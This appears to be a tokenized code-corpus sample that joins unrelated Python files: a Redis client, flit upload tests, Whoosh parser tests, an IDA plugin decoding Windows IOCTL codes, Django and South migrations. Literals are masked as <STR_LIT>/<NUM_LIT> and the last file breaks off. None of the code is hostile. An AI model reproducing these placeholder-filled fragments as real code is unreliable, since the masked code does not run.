<EOL> try : <EOL> if pos [ <NUM_LIT:0> ] * <NUM_LIT:2> > len ( buf ) : <EOL> del buf [ : pos [ <NUM_LIT:0> ] ] <EOL> pos [ <NUM_LIT:0> ] = <NUM_LIT:0> <EOL> bytes = sock . recv ( self . BUFSIZE ) <EOL> if not bytes : <EOL> raise EOFError ( ) <EOL> add_chunk ( bytes ) <EOL> except socket . error as e : <EOL> if e . errno in ( errno . EAGAIN , errno . EINTR ) : <EOL> continue <EOL> else : <EOL> raise <EOL> else : <EOL> break <EOL> def readchar ( ) : <EOL> if len ( buf ) <= pos [ <NUM_LIT:0> ] : <EOL> readmore ( ) <EOL> c = buf [ pos [ <NUM_LIT:0> ] ] <EOL> pos [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> return c <EOL> def readline ( ) : <EOL> if len ( buf ) < <NUM_LIT:2> or pos [ <NUM_LIT:0> ] >= len ( buf ) : <EOL> readmore ( ) <EOL> while True : <EOL> try : <EOL> idx = buf . index ( b'<STR_LIT:\r\n>' , pos [ <NUM_LIT:0> ] ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> break <EOL> readmore ( ) <EOL> res = buf [ pos [ <NUM_LIT:0> ] : idx ] <EOL> pos [ <NUM_LIT:0> ] = idx + <NUM_LIT:2> <EOL> return res <EOL> def readslice ( ln ) : <EOL> while len ( buf ) - pos [ <NUM_LIT:0> ] < ln : <EOL> readmore ( ) <EOL> res = buf [ pos [ <NUM_LIT:0> ] : pos [ <NUM_LIT:0> ] + ln ] <EOL> pos [ <NUM_LIT:0> ] += ln <EOL> return res <EOL> def readone ( ) : <EOL> ch = readchar ( ) <EOL> if ch == <NUM_LIT> : <EOL> cnt = int ( readline ( ) ) <EOL> return [ readone ( ) for i in range ( cnt ) ] <EOL> elif ch == <NUM_LIT> : <EOL> return readline ( ) . decode ( '<STR_LIT:ascii>' ) <EOL> elif ch == <NUM_LIT> : <EOL> return RedisError ( readline ( ) . decode ( '<STR_LIT:ascii>' ) ) <EOL> elif ch == <NUM_LIT> : <EOL> return int ( readline ( ) ) <EOL> elif ch == <NUM_LIT> : <EOL> ln = int ( readline ( ) ) <EOL> if ln < <NUM_LIT:0> : <EOL> return None <EOL> res = readslice ( ln ) <EOL> assert readline ( ) == b'<STR_LIT>' <EOL> return res <EOL> else : <EOL> raise NotImplementedError ( ch ) <EOL> while True : <EOL> self . produce ( readone ( ) ) <EOL> class Redis ( object ) : <EOL> def __init__ ( self , host = '<STR_LIT:localhost>' , port = <NUM_LIT> , unixsock = None , db = <NUM_LIT:0> ) : <EOL> self . unixsock = unixsock <EOL> self . host = host <EOL> self . port = port <EOL> self . db = db <EOL> self . _channel = None <EOL> self . _channel_lock = Lock ( ) <EOL> def check_connection ( self ) : <EOL> if not self . _channel : <EOL> with self . _channel_lock : <EOL> if not self . _channel : <EOL> self . _channel = RedisChannel ( self . host , self . port , <EOL> db = self . db , unixsock = self . unixsock ) <EOL> def execute ( self , * args ) : <EOL> self . check_connection ( ) <EOL> buf = bytearray ( ) <EOL> encode_command ( buf , args ) <EOL> return self . _channel . request ( buf ) . get ( ) <EOL> def future ( self , * args ) : <EOL> self . check_connection ( ) <EOL> buf = bytearray ( ) <EOL> encode_command ( buf , args ) <EOL> return self . _channel . request ( buf ) <EOL> def pipeline ( self , commands ) : <EOL> self . check_connection ( ) <EOL> buf = bytearray ( ) <EOL> for cmd in commands : <EOL> encode_command ( buf , cmd ) <EOL> return self . _channel . request ( buf , len ( commands ) ) . get ( ) <EOL> def bulk ( self , commands ) : <EOL> self . check_connection ( ) <EOL> if commands [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] != '<STR_LIT>' or commands [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> buf = bytearray ( ) <EOL> for cmd in commands : <EOL> encode_command ( buf , cmd ) <EOL> val = self . _channel . request ( buf , len ( commands ) ) . get ( ) <EOL> if val [ <NUM_LIT:0> ] != '<STR_LIT:OK>' : <EOL> raise RuntimeError ( val , commands ) <EOL> for i in val [ <NUM_LIT:1> : - <NUM_LIT:1> ] : <EOL> if isinstance ( i , RedisError ) : <EOL> raise i <EOL> assert i == '<STR_LIT>' <EOL> return val [ - <NUM_LIT:1> ] </s>
<s> """<STR_LIT>""" <EOL> import vim <EOL> import vimp <EOL> def is_available ( ) : <EOL> """<STR_LIT>""" <EOL> for v in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if v in vimp . var : <EOL> return True <EOL> return False <EOL> def add_filetypes ( filetypes ) : <EOL> if isinstance ( filetypes , str ) : <EOL> ft = filetypes <EOL> elif isinstance ( filetypes , list ) : <EOL> ft = '<STR_LIT:.>' . join ( filetypes ) <EOL> vim . command ( '<STR_LIT>' + ft ) </s>
<s> import pathlib <EOL> import pytest <EOL> import requests <EOL> import responses <EOL> from unittest . mock import patch <EOL> from flit import upload , common , wheel <EOL> samples_dir = pathlib . Path ( __file__ ) . parent / '<STR_LIT>' <EOL> repo_settings = { '<STR_LIT:url>' : upload . PYPI , <EOL> '<STR_LIT:username>' : '<STR_LIT:user>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' <EOL> } <EOL> @ responses . activate <EOL> def test_register ( ) : <EOL> responses . add ( responses . POST , upload . PYPI , status = <NUM_LIT:200> ) <EOL> meta , mod = common . metadata_and_module_from_ini_path ( samples_dir / '<STR_LIT>' ) <EOL> with patch ( '<STR_LIT>' , return_value = repo_settings ) : <EOL> upload . register ( meta , '<STR_LIT>' ) <EOL> assert len ( responses . calls ) == <NUM_LIT:1> <EOL> @ responses . activate <EOL> def test_verify ( ) : <EOL> responses . add ( responses . POST , upload . PYPI , status = <NUM_LIT:200> ) <EOL> meta , mod = common . metadata_and_module_from_ini_path ( samples_dir / '<STR_LIT>' ) <EOL> with patch ( '<STR_LIT>' , return_value = repo_settings ) : <EOL> upload . verify ( meta , '<STR_LIT>' ) <EOL> assert len ( responses . calls ) == <NUM_LIT:1> <EOL> @ responses . activate <EOL> def test_upload ( ) : <EOL> responses . add ( responses . POST , upload . PYPI , status = <NUM_LIT:200> ) <EOL> with patch ( '<STR_LIT>' , return_value = repo_settings ) : <EOL> wheel . wheel_main ( samples_dir / '<STR_LIT>' , upload = '<STR_LIT>' ) <EOL> assert len ( responses . calls ) == <NUM_LIT:1> <EOL> @ responses . activate <EOL> def test_upload_registers ( ) : <EOL> with patch ( '<STR_LIT>' ) as register_mock : <EOL> def upload_callback ( request ) : <EOL> status = <NUM_LIT:200> if register_mock . called else <NUM_LIT> <EOL> return ( status , { } , '<STR_LIT>' ) <EOL> responses . add_callback ( responses . POST , upload . PYPI , <EOL> callback = upload_callback ) <EOL> with patch ( '<STR_LIT>' , return_value = repo_settings ) : <EOL> wheel . wheel_main ( samples_dir / '<STR_LIT>' , upload = '<STR_LIT>' ) <EOL> assert len ( responses . calls ) == <NUM_LIT:2> <EOL> assert register_mock . call_count == <NUM_LIT:1> </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT:src>' } , <EOL> packages = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> long_description = """<STR_LIT>""" , <EOL> license = "<STR_LIT>" , <EOL> keywords = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> zip_safe = True , <EOL> test_suite = "<STR_LIT>" , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> ) </s>
<s> import unittest <EOL> from os import mkdir <EOL> from os . path import exists <EOL> from shutil import rmtree <EOL> from whoosh import fields , index , qparser , query , store <EOL> class TestQueryParser ( unittest . TestCase ) : <EOL> def make_index ( self , dirname , schema ) : <EOL> if not exists ( dirname ) : <EOL> mkdir ( dirname ) <EOL> st = store . FileStorage ( dirname ) <EOL> ix = index . Index ( st , schema , create = True ) <EOL> return ix <EOL> def destroy_index ( self , dirname ) : <EOL> if exists ( dirname ) : <EOL> rmtree ( dirname ) <EOL> def test_boost ( self ) : <EOL> qp = qparser . QueryParser ( "<STR_LIT:content>" ) <EOL> q = qp . parse ( "<STR_LIT>" ) <EOL> self . assertEqual ( q . subqueries [ <NUM_LIT:0> ] . boost , <NUM_LIT> ) <EOL> self . assertEqual ( q . subqueries [ <NUM_LIT:1> ] . boost , <NUM_LIT:0.5> ) <EOL> self . assertEqual ( q . subqueries [ <NUM_LIT:1> ] . fieldname , "<STR_LIT>" ) <EOL> self . assertEqual ( q . subqueries [ <NUM_LIT:2> ] . text , "<STR_LIT>" ) <EOL> def test_wildcard ( self ) : <EOL> qp = qparser . QueryParser ( "<STR_LIT:content>" ) <EOL> q = qp . parse ( "<STR_LIT>" ) <EOL> self . assertEqual ( len ( q . subqueries ) , <NUM_LIT:4> ) <EOL> self . assertNotEqual ( q . subqueries [ <NUM_LIT:0> ] . __class__ . __name__ , "<STR_LIT>" ) <EOL> self . assertEqual ( q . subqueries [ <NUM_LIT:1> ] . __class__ . __name__ , "<STR_LIT>" ) <EOL> self . assertEqual ( q . subqueries [ <NUM_LIT:2> ] . __class__ . __name__ , "<STR_LIT>" ) <EOL> self . assertNotEqual ( q . subqueries [ <NUM_LIT:3> ] . __class__ . __name__ , "<STR_LIT>" ) <EOL> self . assertEqual ( q . subqueries [ <NUM_LIT:1> ] . text , "<STR_LIT>" ) <EOL> self . assertEqual ( q . subqueries [ <NUM_LIT:2> ] . text , "<STR_LIT>" ) <EOL> def test_fieldname_underscores ( self ) : <EOL> s = fields . Schema ( my_name = fields . ID ( stored = True ) , my_value = fields . TEXT ) <EOL> ix = self . make_index ( "<STR_LIT>" , s ) <EOL> try : <EOL> w = ix . writer ( ) <EOL> w . add_document ( my_name = u"<STR_LIT>" , my_value = u"<STR_LIT>" ) <EOL> w . add_document ( my_name = u"<STR_LIT>" , my_value = u"<STR_LIT>" ) <EOL> w . commit ( ) <EOL> qp = qparser . QueryParser ( "<STR_LIT>" , schema = ix . schema ) <EOL> s = ix . searcher ( ) <EOL> r = s . search ( qp . parse ( "<STR_LIT>" ) ) <EOL> self . assertEqual ( r [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> s . close ( ) <EOL> ix . close ( ) <EOL> finally : <EOL> self . destroy_index ( "<STR_LIT>" ) <EOL> def test_endstar ( self ) : <EOL> qp = qparser . QueryParser ( "<STR_LIT:text>" ) <EOL> q = qp . parse ( "<STR_LIT>" ) <EOL> self . assertEqual ( q . __class__ . __name__ , "<STR_LIT>" ) <EOL> self . assertEqual ( q . text , "<STR_LIT>" ) <EOL> def test_escaping ( self ) : <EOL> qp = qparser . QueryParser ( "<STR_LIT:text>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from . client import UberClient , UberException , UberLocationNotFound <EOL> from . models import * <EOL> from . geolocation import geolocate , GeolocationExcetion </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import idc <EOL> import idaapi <EOL> def winio_decode ( ioctl_code ) : <EOL> """<STR_LIT>""" <EOL> access_names = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> method_names = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> device_name_unknown = '<STR_LIT>' <EOL> device_names = [ <EOL> device_name_unknown , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> device_name_unknown , <EOL> device_name_unknown , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> device_names2 = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:code>' : <NUM_LIT> } , <EOL> ] <EOL> device = ( ioctl_code >> <NUM_LIT:16> ) & <NUM_LIT> <EOL> access = ( ioctl_code >> <NUM_LIT> ) & <NUM_LIT:3> <EOL> function = ( ioctl_code >> <NUM_LIT:2> ) & <NUM_LIT> <EOL> method = ioctl_code & <NUM_LIT:3> <EOL> if device >= len ( device_names ) : <EOL> device_name = device_name_unknown <EOL> for dev in device_names2 : <EOL> if device == dev [ '<STR_LIT:code>' ] : <EOL> device_name = dev [ '<STR_LIT:name>' ] <EOL> break <EOL> else : <EOL> device_name = device_names [ device ] <EOL> print '<STR_LIT>' % ( ioctl_code ) <EOL> print '<STR_LIT>' % ( device_name , device ) <EOL> print '<STR_LIT>' % ( function ) <EOL> print '<STR_LIT>' % ( method_names [ method ] , method ) <EOL> print '<STR_LIT>' % ( access_names [ access ] , access ) <EOL> return <EOL> class WinIoCtlPlugin ( idaapi . plugin_t ) : <EOL> """<STR_LIT>""" <EOL> flags = idaapi . PLUGIN_UNL <EOL> comment = ( '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> help = '<STR_LIT>' <EOL> wanted_name = '<STR_LIT>' <EOL> wanted_hotkey = '<STR_LIT>' <EOL> def init ( self ) : <EOL> return idaapi . PLUGIN_OK <EOL> def run ( self , _ = <NUM_LIT:0> ) : <EOL> if idc . GetOpType ( idc . ScreenEA ( ) , <NUM_LIT:1> ) != <NUM_LIT:5> : <EOL> return <EOL> value = idc . GetOperandValue ( idc . ScreenEA ( ) , <NUM_LIT:1> ) & <NUM_LIT> <EOL> winio_decode ( value ) <EOL> def term ( self ) : <EOL> pass <EOL> def PLUGIN_ENTRY ( ) : <EOL> return WinIoCtlPlugin ( ) <EOL> def main ( ) : <EOL> if len ( sys . argv ) != <NUM_LIT:2> : <EOL> return <EOL> winio_decode ( int ( sys . argv [ <NUM_LIT:1> ] , <NUM_LIT:16> ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT>' , models . OneToOneField ( auto_created = True , primary_key = True , to_field = '<STR_LIT:id>' , serialize = False , to = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( verbose_name = '<STR_LIT>' , to_field = '<STR_LIT:id>' , to = '<STR_LIT>' , null = True ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( '<STR_LIT>' , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT>' , models . OneToOneField ( auto_created = True , primary_key = True , to_field = '<STR_LIT:id>' , serialize = False , to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( '<STR_LIT>' , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT>' , models . OneToOneField ( auto_created = True , primary_key = True , to_field = '<STR_LIT:id>' , serialize = False , to = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( verbose_name = '<STR_LIT>' , to_field = '<STR_LIT:id>' , to = '<STR_LIT>' , null = True ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( '<STR_LIT>' , ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT>' , models . OneToOneField ( parent_link = True , auto_created = True , primary_key = True , serialize = False , to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> } , <EOL> bases = ( '<STR_LIT>' , ) , <EOL> ) , <EOL> ] </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import DataMigration <EOL> from django . db import models <EOL> from fancypages . utils import FP_NODE_MODEL , FP_PAGE_MODEL <EOL> from fancypages . compat import AUTH_USER_MODEL , AUTH_USER_MODEL_NAME <EOL> class Migration ( DataMigration ) : <EOL> def forwards ( self , orm ) : <EOL> "<STR_LIT>" <EOL> if FP_NODE_MODEL == '<STR_LIT>' and FP_PAGE_MODEL == '<STR_LIT>' : <EOL> for page in orm . FancyPage . objects . all ( ) : <EOL> node , __ = orm . PageNode . objects . get_or_create ( <EOL> depth = page . depth , description = page . description , <EOL> image = page . image , name = page . name , numchild = page . numchild , <EOL> path = page . path , slug = page . slug ) <EOL> page . node = node <EOL> page . save ( ) <EOL> def backwards ( self , orm ) : <EOL> "<STR_LIT>" <EOL> if FP_NODE_MODEL == '<STR_LIT>' and FP_PAGE_MODEL == '<STR_LIT>' : <EOL> for node in orm . PageNode . objects . all ( ) : <EOL> node . page . depth = node . depth <EOL> node . page . description = node . description <EOL> node . page . image = node . image <EOL> node . page . name = node . name <EOL> node . page . numchild = node . numchild <EOL> node . page . path = node . path <EOL> node . page . slug = node . slug <EOL> node . page . save ( ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" . format ( AUTH_USER_MODEL ) } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:size>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:width>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> AUTH_USER_MODEL : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : AUTH_USER_MODEL_NAME } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : 